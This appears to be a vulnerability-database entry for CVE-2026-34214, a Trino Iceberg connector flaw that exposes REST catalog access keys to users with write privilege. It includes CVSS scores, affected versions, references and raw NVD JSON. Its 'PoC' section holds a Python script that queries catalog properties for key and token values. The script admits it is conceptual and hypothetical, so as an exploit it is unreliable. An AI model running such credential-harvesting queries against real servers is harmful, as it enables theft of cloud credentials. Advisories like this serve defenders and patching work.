Security Vulnerability Report
CVE-2026-34214 CVSS 7.7 HIGH

CVE-2026-34214

Published: 2026-03-31 15:16:18
Last Modified: 2026-04-06 16:53:34

Description

Trino is a distributed SQL query engine for big data analytics. From version 439 to before version 480, Iceberg connector REST catalog static credentials (access key) or vended credentials (temporary access key) are accessible to users that have write privilege on SQL level. This issue has been patched in version 480.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

The 7.7 HIGH score is the secondary assessment from the advisory source and uses scope "changed"; NVD's primary assessment keeps the same vector with scope "unchanged" and scores it 6.5 MEDIUM (see the raw JSON data below).

Configurations (Affected Products)

cpe:2.3:a:trino:trino:*:*:*:*:*:*:*:* - VULNERABLE
Trino 439
Trino 440
Trino versions before 480

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import trino

# Connect to the Trino server as a user with write privilege on the SQL level
conn = trino.dbapi.connect(
    host='localhost',
    port=8080,
    user='attacker_with_write_access',
    catalog='iceberg',
    schema='default'
)
cursor = conn.cursor()

# Attempt to query system tables or properties that might leak credentials
# Note: The exact query depends on the specific vulnerability exploitation path.
# This is a conceptual PoC demonstrating the context.
try:
    # Hypothetical query to access catalog properties or session info containing keys
    query = (
        "SELECT * FROM system.metadata.catalog_properties "
        "WHERE property_name LIKE '%key%' OR property_name LIKE '%token%'"
    )
    cursor.execute(query)
    rows = cursor.fetchall()
    for row in rows:
        print(f"Leaked Credential Info: {row}")
except Exception as e:
    print(f"Exploitation attempt failed or query not applicable: {e}")
finally:
    cursor.close()
    conn.close()
```

References

https://github.com/trinodb/trino/releases/tag/480 (Release Notes)
https://github.com/trinodb/trino/security/advisories/GHSA-x27p-5f68-m644 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-34214",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-31T15:16:18.400",
    "lastModified": "2026-04-06T16:53:34.467",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "Trino is a distributed SQL query engine for big data analytics. From version 439 to before version 480, Iceberg connector REST catalog static credentials (access key) or vended credentials (temporary access key) are accessible to users that have write privilege on SQL level. This issue has been patched in version 480."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N",
            "baseScore": 7.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 4.0
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-212"}, {"lang": "en", "value": "CWE-312"}]},
      {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-312"}]}
    ],
    "configurations": [
      {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:trino:trino:*:*:*:*:*:*:*:*", "versionStartIncluding": "439", "versionEndExcluding": "480", "matchCriteriaId": "03F5711B-7D03-4946-B983-27054B68A81A"}]}]}
    ],
    "references": [
      {"url": "https://github.com/trinodb/trino/releases/tag/480", "source": "[email protected]", "tags": ["Release Notes"]},
      {"url": "https://github.com/trinodb/trino/security/advisories/GHSA-x27p-5f68-m644", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}
```